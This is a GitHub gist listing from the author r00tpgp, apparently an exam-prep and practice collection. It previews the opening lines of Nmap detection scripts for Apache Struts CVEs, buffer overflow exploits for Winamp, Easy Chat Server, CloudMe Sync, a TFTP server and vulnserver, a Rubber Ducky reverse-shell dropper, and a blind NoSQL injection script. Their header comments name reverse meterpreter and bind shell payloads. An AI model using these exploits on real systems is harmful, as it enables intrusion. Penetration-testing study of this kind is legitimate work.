r00t.pgp r00tpgp
r00tpgp
/ http-vuln-cve2018-11776.nse
Last active
February 6, 2019 16:31
Nmap NSE script to detect Apache Struts 2 Namespace Redirect OGNL Injection Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| description = [[ | |
| Detects whether the specified URL is vulnerable to the Apache Strut2 Namespace Redirect OGNL Injection | |
| Remote Code Execution Vulnerability (CVE-2018-11776). | |
| ]] | |
| local http = require "http" | |
| local shortport = require "shortport" | |
| local vulns = require "vulns" | |
| local stdnse = require "stdnse" | |
| local string = require "string" |
r00tpgp
/ http-vuln-cve2017-9805.nse
Last active
August 30, 2019 01:49
Nmap NSE Script Detects whether the specified URL is vulnerable to the Apache Struts REST Plugin XStream Remote Code Execution Vulnerability (CVE-2017-9805)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| description = [[ | |
| Detects whether the specified URL is vulnerable to the Apache Struts REST Plugin XStream | |
| Remote Code Execution Vulnerability (CVE-2017-9805). | |
| ]] | |
| local http = require "http" | |
| local shortport = require "shortport" | |
| local vulns = require "vulns" | |
| local stdnse = require "stdnse" | |
| local string = require "string" |
r00tpgp
/ poc_GTER-W00T.py
Last active
March 16, 2020 21:13
vulnserver.exe Buffer Overflow scripts in preparation for CTP/OSCE Exam
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # vulnserver.exe GTER BoF using egghunter by r00tpgp | |
| # 9/6/2018 | |
| # In preperation for CTP/OSCE | |
| # final evil payload is sent after few seconds delay to enable egghunter to locate it | |
| # | |
| import socket | |
| import os | |
| import sys | |
| import time |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Remote BoF for TFTPServerSPInstallerV1.41. | |
| # Dev/Modified by r00tpgp for educational purposes, taken off orginal tftpd exploit by muts | |
| # | |
| import socket | |
| import sys | |
| host = '172.16.155.129' | |
| port = 69 | |
| try: |
r00tpgp
/ winamp_5.12_Exploit.pl
Last active
November 7, 2018 11:53
CVE-2006-0476: Winamp 5.12 Buffer Overflow (Egghunter)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl -w | |
| # ==================================================================== | |
| # Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit | |
| # Original Poc by Umesh Wanve (umesh_345@yahoo.com) | |
| # Modified by r00tpgp for educational puposes - 28 May 2018 | |
| # Full documentation at www.r00tpgp.com | |
| # ==================================================================== | |
| # msfpayload windows/shell_bind_tcp LPORT=4444 R > bind | |
| # msfencode -e x86/alpha_mixed -i bind -t perl |
r00tpgp
/ easychat-3.1-exploit.py
Created
March 16, 2018 16:15
Remote Buffer Overflow for Easy Chat Server 3.1. Tested on Win7 x86 SP1. Returns reverse meterpreter shell. Educational purposes only.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Easy Chat Server 3.1 Remote Exploit | |
| # Written by r00tpgp @ http://www.r00tpgp.com | |
| # Usage: python easychat-exploit.py <victim-ip> <port> | |
| # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 | |
| # CVE: CVE-2004-2466 | |
| # Installer: http://www.echatserver.com/ | |
| # Tested on Windows 7 32b SP1 | |
| import sys, socket, time |
r00tpgp
/ CloudMeSync-1.9.2-Exploit-SEH.py
Last active
March 10, 2018 16:00
This remote buffer overflow exploit was written using SEH overwrite. The previous one I wrote was plain vanilla EIP overwrite. Both exploits use the same msf generated shellcode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # CloudMe Sync 1.9.2 Remote Exploit | |
| # Written by r00tpgp @ http://www.r00tpgp.com | |
| # SEH Buffer Overflow | |
| # Usage: python CloudMe-1.9.2-Exploit.py <victim-ip> <port> | |
| # Spawns reverse meterpreter LHOST=192.168.0.68 LPORT=1990 | |
| # CVE: CVE-2018-6892 | |
| # CloudMe Installer: https://org.cloudme.com/en/sync | |
| # Tested on Windows 7 32b SP1 | |
| # Link to PoC video: https://www.youtube.com/watch?v=PwBdSOHFYNU |
r00tpgp
/ CloudMeSync-1.9.2-Exploit.py
Last active
March 4, 2018 15:32
CloudMeSync ver 1.9.2 remote buffer overflow exploit. Tested on Win7 32b SP1.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # CloudMe Sync 1.9.2 Remote Exploit | |
| # Written by r00tpgp @ http://www.r00tpgp.com | |
| # Usage: python CloudMe-1.9.2-Exploit.py <victim-ip> <port> | |
| # Spawns reverse meterpreter LHOST=192.168.0.68 LPORT=1990 | |
| # CVE: CVE-2018-6892 | |
| # CloudMe Installer: https://org.cloudme.com/en/sync | |
| # Tested on Windows 7 32b SP1 | |
| import sys, socket, time |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Author: Darren Kitchen with mad props to IllWill dabermania.blogspot.co.il/2011/04/copying-executable-from-teensy-using.html | |
| REM 27/12/2017: Mod by r00tpgp, removed admin privilege cmd, added auto overwrite on copy con and removed absolute path | |
| REM Duckencoder: 1.0 | |
| REM Target: Windows 7(32&64b), Windows 2008 Server | |
| REM Description: Opens administrative CMD prompt, creates decoder.vbs containing code to convert base64 encoded ascii to binary, creates text file including base64 ascii of binary file to create reverse shell. converts second file to exe with first file. Executes with host and port parameters. Props to go illwill for this payload. See dabermania.blogspot.co.il/2011/04/copying-executable-from-teensy-using.html |
r00tpgp
/ mongodb02.sh
Last active
June 9, 2020 09:49
mongodb noSQL injection Exercise 02 @ Pentesterlab.com
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This script was written to do blind nosql injection to enumerate the UUID | |
| # Written by r00tpgp | |
| # 10 Dec 2018 | |
| # | |
| charset=("a" "b" "c" "d" "e" "f" "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "-") | |
| uri="http://xxxxxxxxx" | |
| d=0 | |
| for ((j=0;j<=36;j+=1)) |
NewerOlder